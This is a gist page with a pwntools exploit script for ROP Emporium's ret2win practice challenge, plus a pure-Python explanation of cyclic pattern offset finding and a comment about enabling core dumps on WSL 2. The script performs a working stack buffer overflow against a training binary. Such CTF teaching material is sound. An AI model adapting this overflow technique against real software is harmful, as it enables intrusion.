Created September 1, 2017 20:35
Example Exploit for ROP Emporium's ret2win Challenge
```python
from pwn import *

# Set up pwntools to work with this binary
elf = context.binary = ELF('ret2win')

# Enable verbose logging so we can see exactly what is being sent.
context.log_level = 'debug'

# Print out the target address
info("%#x target", elf.symbols.ret2win)

# Figure out how big of an overflow we need by crashing the
# process once.
io = process(elf.path)

# We will send a 'cyclic' pattern which overwrites the return
# address on the stack. The value 128 is longer than the buffer.
io.sendline(cyclic(128))

# Wait for the process to crash
io.wait()

# Open up the corefile (requires core dumps to be enabled on the host)
core = io.corefile

# Print out the address of RSP at the time of crashing
stack = core.rsp
info("%#x stack", stack)

# Read four bytes from RSP, which will be some of our cyclic data.
#
# With this snippet of the pattern, we know the exact offset from
# the beginning of our controlled data to the return address.
pattern = core.read(stack, 4)
info("%r pattern", pattern)

# Craft a new payload which puts the "target" address at the correct offset
payload = fit({
    pattern: elf.symbols.ret2win
})

# Send the payload to a new copy of the process
io = process(elf.path)
io.sendline(payload)
io.recvuntil(b"Here's your flag:")  # bytes, not str, for Python 3 pwntools

# Get our flag!
flag = io.recvline()
success(flag)
```
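Why four bytes read at RSP are enough to recover the offset, as an added example written for this page (my own pure-Python reimplementation of the idea behind pwntools' cyclic() and cyclic_find(), not the gist's or pwntools' own code): the pattern is a de Bruijn sequence over the lowercase alphabet, so each 4-byte window appears at most once, and walking the same generator maps a captured window back to its offset.

```python
import string
from itertools import islice

ALPHABET = string.ascii_lowercase  # same default alphabet pwntools' cyclic() uses


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) symbol by symbol (Lyndon-word
    construction). Every length-n window occurs at most once in the linear
    sequence, which is what lets a short snippet pin down its own offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern, e.g. cyclic(20) -> b'aaaabaaacaaadaaaeaaa'."""
    return "".join(islice(de_bruijn(n=n), length)).encode()


def cyclic_find(snippet, n=4):
    """Offset at which `snippet` occurs in the pattern, or -1 if it never does.
    Accepts the raw bytes read from the stack (as core.read() returns them) or
    an integer register value, interpreted little-endian like the core file."""
    if isinstance(snippet, int):
        snippet = snippet.to_bytes(n, "little")
    target = snippet[:n].decode()  # only the first n bytes are needed
    if len(target) != n:
        raise ValueError("need at least %d bytes of the pattern" % n)
    window = ""
    for i, ch in enumerate(de_bruijn(n=n)):
        window = (window + ch)[-n:]  # sliding n-symbol window
        if window == target:
            return i - n + 1
    return -1
```

In the gist above, cyclic_find(core.read(core.rsp, 4)) gives the same offset that fit() resolves from the pattern key.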
Although my issue was kind of different, your comment gave me a better perspective.
Problem

I got stuck trying to find the reason for not having a `/proc/sys/kernel/core_pattern` available. As I was running through the Windows Subsystem for Linux (Ubuntu 20.04) I had a feeling the VM instance was not writing the core dumps properly. The first issue was that I got empty output from `dmesg -t` (I kind of ignored that part). And then when I tried using the Python script above I got `No such file or directory` from:

Solution

A bit of background here:

The solution was to run my Windows Subsystem for Linux as WSL 2 instead of 1 and then restart my WSL instance:

I put the following into PowerShell based on the link above:

And now `core_pattern` was available in the Ubuntu shell:

And I could get output from `dmesg -t`: